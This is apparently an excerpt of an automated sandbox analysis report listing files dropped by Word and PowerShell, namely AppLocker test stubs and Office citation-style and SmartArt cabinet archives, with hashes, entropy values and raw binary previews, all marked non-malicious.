                                                Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cflee3n.fai.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vhbg40v.bqh.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ezdkck5x.dsf.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yz42ofw0.1n5.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\cabEFDF.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):22008
                                                Entropy (8bit):7.662386258803613
                                                Encrypted:false
                                                SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                                MD5:ABBF10CEE9480E41D81277E9538F98CB
                                                SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                                SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                                SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                                Malicious:false
                                                Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm

                                                C:\Users\user\AppData\Local\Temp\cabEFF0.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):31562
                                                Entropy (8bit):7.81640835713744
                                                Encrypted:false
                                                SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                                MD5:1D6F8E73A0662A48D332090A4C8C898F
                                                SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                                SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                                SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                                Malicious:false
                                                Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.

                                                C:\Users\user\AppData\Local\Temp\cabEFF1.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):34816
                                                Entropy (8bit):7.840826397575377
                                                Encrypted:false
                                                SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                                MD5:62863124CDCDA135ECC0E722782CB888
                                                SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                                SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                                SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                                Malicious:false
                                                Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..

                                                C:\Users\user\AppData\Local\Temp\cabEFF2.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):31835
                                                Entropy (8bit):7.81952379746457
                                                Encrypted:false
                                                SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                                MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                                SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                                SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                                SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                                Malicious:false
                                                Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..

                                                C:\Users\user\AppData\Local\Temp\cabEFF3.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):31605
                                                Entropy (8bit):7.820497014278096
                                                Encrypted:false
                                                SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                                MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                                SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                                SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                                SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                                Malicious:false
                                                Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....

                                                C:\Users\user\AppData\Local\Temp\cabEFF4.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):35519
                                                Entropy (8bit):7.846686335981972
                                                Encrypted:false
                                                SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                                MD5:53EE9DA49D0B84357038ECF376838D2E
                                                SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                                SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                                SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                                Malicious:false
                                                Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>

                                                C:\Users\user\AppData\Local\Temp\cabEFF5.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):26944
                                                Entropy (8bit):7.7574645319832225
                                                Encrypted:false
                                                SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                                MD5:F913DD84915753042D856CEC4E5DABA5
                                                SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                                SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                                SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                                Malicious:false
                                                Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.

                                                C:\Users\user\AppData\Local\Temp\cabEFF6.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):31471
                                                Entropy (8bit):7.818389271364328
                                                Encrypted:false
                                                SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                                MD5:91AADBEC4171CFA8292B618492F5EF34
                                                SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                                SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                                SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                                Malicious:false
                                                Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....

                                                C:\Users\user\AppData\Local\Temp\cabEFF7.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):30957
                                                Entropy (8bit):7.808231503692675
                                                Encrypted:false
                                                SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                                MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                                SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                                SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                                SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                                Malicious:false
                                                Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F

                                                C:\Users\user\AppData\Local\Temp\cabF007.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):20235
                                                Entropy (8bit):7.61176626859621
                                                Encrypted:false
                                                SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                                MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                                SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                                SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                                SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                                Malicious:false
                                                Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).

                                                C:\Users\user\AppData\Local\Temp\cabF02A.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):31482
                                                Entropy (8bit):7.808057272318224
                                                Encrypted:false
                                                SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                                MD5:F10DF902980F1D5BEEA96B2C668408A7
                                                SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                                SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                                SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                                Malicious:false
                                                Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:

                                                C:\Users\user\AppData\Local\Temp\cabF06B.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                Category:dropped
                                                Size (bytes):20457
                                                Entropy (8bit):7.612540359660869
                                                Encrypted:false
                                                SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                                MD5:4EFA48EC307EAF2F9B346A073C67FCFB
